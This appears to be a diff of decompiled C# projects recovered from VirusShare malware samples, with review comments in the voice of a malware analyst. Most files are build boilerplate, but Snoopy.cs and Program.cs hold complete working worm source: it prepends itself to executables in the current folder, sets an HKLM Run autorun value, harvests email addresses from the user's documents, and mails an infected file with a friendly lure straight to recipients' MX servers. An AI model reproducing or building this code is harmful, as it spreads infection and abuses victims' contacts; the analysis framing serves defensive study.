[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
[DebuggerNonUserCode]
public MySettings()
{
}
public static MySettings Default
{
get
{
MySettings defaultInstance = MySettings.defaultInstance;
return defaultInstance;
}
}
}
}
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.MySettingsProperty
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace nemo.My
{
[HideModuleName]
[CompilerGenerated]
[StandardModule]
[DebuggerNonUserCode]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings
{
get
{
MySettings settings = MySettings.Default;
return settings;
}
}
}
}
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: nemo.My.Resources.Resources
// Assembly: nemo, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 2D9B0A6D-192E-4D73-A06F-ACACE5271DF2
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace nemo.My.Resources
{
[CompilerGenerated]
[HideModuleName]
[DebuggerNonUserCode]
[StandardModule]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) nemo.My.Resources.Resources.resourceMan, (object) null))
nemo.My.Resources.Resources.resourceMan = new ResourceManager("nemo.Resources", typeof (nemo.My.Resources.Resources).Assembly);
return nemo.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => nemo.My.Resources.Resources.resourceCulture;
set => nemo.My.Resources.Resources.resourceCulture = value;
}
}
}
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,51 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{2849F21E-C193-4C69-A296-5AA86E6E4EB3}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>nemo</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>nemo</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="My\MyApplication.cs" />
<Compile Include="My\MyComputer.cs" />
<Compile Include="My\MyProject.cs" />
<Compile Include="My\MySettings.cs" />
<Compile Include="My\MySettingsProperty.cs" />
<Compile Include="My\Resources\Resources.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "nemo", "Virus.MSIL.Small.g-992d8d07b3cfb9a39db36df36667d41467ea9ad1dac69c419c3c4c4cf5c37665.csproj", "{2849F21E-C193-4C69-A296-5AA86E6E4EB3}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{2849F21E-C193-4C69-A296-5AA86E6E4EB3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{2849F21E-C193-4C69-A296-5AA86E6E4EB3}.Debug|Any CPU.Build.0 = Debug|Any CPU
{2849F21E-C193-4C69-A296-5AA86E6E4EB3}.Release|Any CPU.ActiveCfg = Release|Any CPU
{2849F21E-C193-4C69-A296-5AA86E6E4EB3}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,6 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: Guid("1f75ac90-f2a6-4cc9-8081-1b01a57ce9d3")]
[assembly: ComVisible(false)]
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,32 @@
// Decompiled with JetBrains decompiler
// Type: Snoopy.Program
// Assembly: Snoopy, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 225FC345-1E6A-4DC3-B737-1C6B8FCBFB0B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740.exe
using System;
using System.IO;
using System.Threading;
namespace Snoopy
{
internal class Program
{
private static string myDir = Directory.GetCurrentDirectory();
private static Thread t;
private static void Main(string[] args)
{
Snoopy.Snoopy snoopy = new Snoopy.Snoopy();
snoopy.Replicate(Program.myDir);
if (snoopy.CheckReg())
{
Program.t = new Thread(new ThreadStart(snoopy.Send));
Program.t.Start();
}
if (DateTime.Now.Day != 8)
return;
snoopy.Message();
}
}
}
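Review bot: `Main` has no comment saying which of its steps are conditional, which matters when comparing this listing against a detonation report. `snoopy.Replicate(Program.myDir)` runs unconditionally on the process's current directory, the `Send` thread starts only when `CheckReg()` returns true, and `snoopy.Message()` is skipped unless `DateTime.Now.Day` is 8. I would add above the date test `// Analyst note: the message box is date-gated (day 8 of the month); a sandbox run on any other day will not show it, while the file writes and Run-key access above still occur.`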
@@ -0,0 +1,248 @@
// Decompiled with JetBrains decompiler
// Type: Snoopy.Snoopy
// Assembly: Snoopy, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 225FC345-1E6A-4DC3-B737-1C6B8FCBFB0B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Net.Mail;
using System.Runtime.InteropServices;
using System.Text.RegularExpressions;
using System.Windows.Forms;
namespace Snoopy
{
internal class Snoopy
{
private string me = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);
private string myDocs = Environment.GetFolderPath(Environment.SpecialFolder.Personal);
private ArrayList arrEmails = new ArrayList();
private ArrayList arInfect = new ArrayList();
[DllImport("dnsapi", EntryPoint = "DnsQuery_W", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int Dns(
[MarshalAs(UnmanagedType.VBByRefStr)] ref string strName,
int intType,
int intOpt,
int intServer,
ref IntPtr pResult,
int intReserved);
public bool CheckReg()
{
string keyName = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run";
if (!((string) Registry.GetValue(keyName, nameof (Snoopy), (object) nameof (Snoopy)) == nameof (Snoopy)))
return false;
Registry.SetValue(keyName, nameof (Snoopy), (object) this.me);
return true;
}
public void Message()
{
int num = (int) MessageBox.Show("Infected with MSIL.Snoopy", nameof (Snoopy));
}
public void Replicate(string dir)
{
FileStream input1 = new FileStream(this.me, FileMode.Open, FileAccess.Read);
BinaryReader binaryReader1 = new BinaryReader((Stream) input1);
byte[] numArray1 = new byte[input1.Length];
for (int index = 0; index < numArray1.Length; ++index)
numArray1[index] = binaryReader1.ReadByte();
input1.Close();
binaryReader1.Close();
string[] files = Directory.GetFiles(dir, "*.exe");
for (int index1 = 0; index1 < files.Length; ++index1)
{
FileStream input2 = new FileStream(files[index1], FileMode.Open, FileAccess.Read);
BinaryReader binaryReader2 = new BinaryReader((Stream) input2);
byte[] numArray2 = new byte[input2.Length];
for (int index2 = 0; index2 < numArray2.Length; ++index2)
numArray2[index2] = binaryReader2.ReadByte();
binaryReader2.Close();
input2.Close();
if (numArray2[60] != (byte) 128)
{
BinaryWriter binaryWriter = new BinaryWriter((Stream) new FileStream(files[index1], FileMode.Open, FileAccess.Write));
for (int index3 = 0; index3 < numArray1.Length; ++index3)
binaryWriter.BaseStream.WriteByte(numArray1[index3]);
for (int index4 = 0; index4 < numArray2.Length; ++index4)
binaryWriter.BaseStream.WriteByte(numArray2[index4]);
binaryWriter.Close();
input2.Close();
this.arInfect.Add((object) files[index1]);
}
}
FileInfo fileInfo = new FileInfo(this.me);
if ((int) fileInfo.Length - 20480 <= 0)
{
int num = (int) MessageBox.Show("Not a valid win32 program", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Hand);
Application.Exit();
}
else
{
try
{
string str = (DateTime.Now.Hour + DateTime.Now.Second + DateTime.Now.Minute).ToString() + ".exe";
FileStream fileStream = new FileStream(str, FileMode.CreateNew);
File.SetAttributes(str, FileAttributes.Hidden);
for (int index = 20480; (long) index < fileInfo.Length; ++index)
fileStream.WriteByte(numArray1[index]);
fileStream.Close();
try
{
Process.Start(str).WaitForExit();
}
catch (Exception ex)
{
int num = (int) MessageBox.Show("This file is corrupt", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Hand);
}
File.Delete(str);
Application.Exit();
}
catch (Exception ex)
{
}
}
}
public void Send()
{
this.arrEmails = this.SearchEmails(this.myDocs, "*.*");
ArrayList arrEmails = this.arrEmails;
arrEmails.Reverse();
string file = this.GetFile();
if (!(file != "") || this.arrEmails.Count <= 0)
return;
Attachment attachment = new Attachment(file);
IEnumerator enumerator = this.arrEmails.GetEnumerator();
ArrayList arrayList = new ArrayList();
while (enumerator.MoveNext())
{
string address1 = Convert.ToString(enumerator.Current);
foreach (object obj in arrEmails)
{
string address2 = Convert.ToString(obj);
if (address1 != address2 && !arrayList.Contains((object) address1))
{
arrayList.Add((object) address1);
MailAddress to = new MailAddress(address1);
MailMessage message = new MailMessage(new MailAddress(address2), to);
message.Subject = "Hey";
message.Body = "Hey hows it going? I attached that file you were asking about. Let me know if it worKs for you or not. I'm not sure what I'm going to do the tommorow maybe get some coffee and do some shopping. Well give me a call later okay?";
message.Attachments.Add(attachment);
string mxRecords = this.GetMXRecords(address1.Substring(address1.IndexOf("@")).Replace("@", string.Empty));
try
{
new SmtpClient(mxRecords).Send(message);
}
catch (Exception ex)
{
}
}
}
}
attachment.Dispose();
}
private ArrayList SearchEmails(string dir, string fileType)
{
ArrayList arrayList = new ArrayList();
foreach (FileInfo file in new DirectoryInfo(dir).GetFiles(fileType))
{
Console.WriteLine(file.FullName);
StreamReader streamReader = File.OpenText(file.FullName);
string InputData;
while ((InputData = streamReader.ReadLine()) != null)
{
string addr = this.ExtractAddr(InputData);
if (addr != "" && !arrayList.Contains((object) addr) && new Regex("^([a-zA-Z0-9_\\-\\.]+)@((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.)|(([a-zA-Z0-9\\-]+\\.)+))([a-zA-Z]{2,4}|[0-9]{1,3})(\\]?)$").IsMatch(addr) && !arrayList.Contains((object) addr))
arrayList.Add((object) addr);
}
}
return arrayList;
}
public string ExtractAddr(string InputData)
{
int num1 = InputData.IndexOf("@", 0) + 1;
int num2 = 1;
int num3 = InputData.Length;
string addr = "";
if (num1 == 0)
return addr;
for (int index = num1 - 1; index >= 1; --index)
{
string str = InputData.Substring(index - 1, 1);
if (str == " " | str == "<" | str == "(" | str == ":" | str == "," | str == "[")
{
num2 = index + 1;
break;
}
}
for (int index = num1 + 1; index <= InputData.Length; ++index)
{
string str = InputData.Substring(index - 1, 1);
if (str == " " | str == ">" | str == ")" | str == ":" | str == "," | str == "]")
{
num3 = index - 1;
break;
}
}
return Regex.Replace(InputData.Substring(num2 - 1, num3 - num2 + 1), "<(.|\\n)*?>", string.Empty).Replace("&nbsp;", "").Replace(" ", "").Replace("\"", "");
}
private string GetFile()
{
string file = "";
if (this.arInfect.Count > 0)
{
foreach (object obj in this.arInfect)
file = Convert.ToString(obj);
}
return file;
}
public string GetMXRecords(string host)
{
IntPtr zero1 = IntPtr.Zero;
IntPtr zero2 = IntPtr.Zero;
int num = Snoopy.Snoopy.Dns(ref host, 15, 8, 0, ref zero1, 0);
string mxRecords = "";
Snoopy.Snoopy.STRMX structure;
if (num != 0)
{
mxRecords = host;
}
else
{
for (IntPtr ptr = zero1; !ptr.Equals((object) IntPtr.Zero); ptr = structure.pNext)
{
structure = (Snoopy.Snoopy.STRMX) Marshal.PtrToStructure(ptr, typeof (Snoopy.Snoopy.STRMX));
if (structure.sType == (short) 15)
{
string stringAuto = Marshal.PtrToStringAuto(structure.pNameEx);
if (stringAuto != "")
mxRecords = stringAuto;
}
}
}
return mxRecords;
}
private struct STRMX
{
public IntPtr pNext;
public string strName;
public short sType;
public int intFlag;
public int intTTL;
public int intRes;
public IntPtr pNameEx;
}
}
}
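Review bot: `CheckReg` reads like a query but also writes, and nothing in the file says so: when the `Snoopy` value under `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` is missing (the default passed to `Registry.GetValue` comes back) or equals the literal `Snoopy`, it overwrites the value with `this.me`, the path of the running executable. I would document that as `// Analyst note: sets autorun value "Snoopy" = path of this executable under HKLM\...\Run; returns true only on the call that writes it.` The constants in `Replicate` deserve the same treatment: `numArray2[60] != (byte) 128` is the test that decides whether a `*.exe` in `dir` is rewritten, and `20480` is the offset from which the trailing bytes of the running file are copied to a hidden `.exe` named from the sum of the current hour, minute and second and then started. In `Send`, a short comment that mail is handed directly to the host returned by `GetMXRecords`, with the sender set to another harvested address, would point responders at outbound SMTP and MX lookups from workstations as the network-side evidence.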
@@ -0,0 +1,42 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Snoopy</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>Snoopy</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Snoopy.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Snoopy", "Virus.MSIL.Small.h-23076d3d679e7978b958427852298ee1d86e790a9898976bd84186486feef740.csproj", "{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{116BB029-765B-4A5A-AC74-DABCCEA1FE6B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,8 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: Guid("ef734abf-6273-472c-ab64-4f2fb14840cc")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: ComVisible(false)]
[assembly: AssemblyCopyright("Copyright © Xo0 ")]
[assembly: AssemblyVersion("1.0.0.0")]
@@ -0,0 +1,32 @@
// Decompiled with JetBrains decompiler
// Type: test.Form1
// Assembly: test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EA7EE8FE-E135-42FE-898E-ADC550D85275
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe
using System.ComponentModel;
using System.Windows.Forms;
namespace test
{
public class Form1 : Form
{
private IContainer components;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.AutoScaleMode = AutoScaleMode.Font;
this.Text = nameof (Form1);
}
public Form1() => this.InitializeComponent();
}
}
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: test.Properties.Resources
// Assembly: test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EA7EE8FE-E135-42FE-898E-ADC550D85275
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.i-93f15ecd9a787f306e490b3356318191254e5ad1c182149e4c7fcae04c3279b1.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace test.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (test.Properties.Resources.resourceMan == null)
test.Properties.Resources.resourceMan = new ResourceManager("test.Properties.Resources", typeof (test.Properties.Resources).Assembly);
return test.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => test.Properties.Resources.resourceCulture;
set => test.Properties.Resources.resourceCulture = value;
}
}
}
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: test.Properties.Settings
// Assembly: test, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: EA7EE8FE-E135-42FE-898E-ADC550D85275
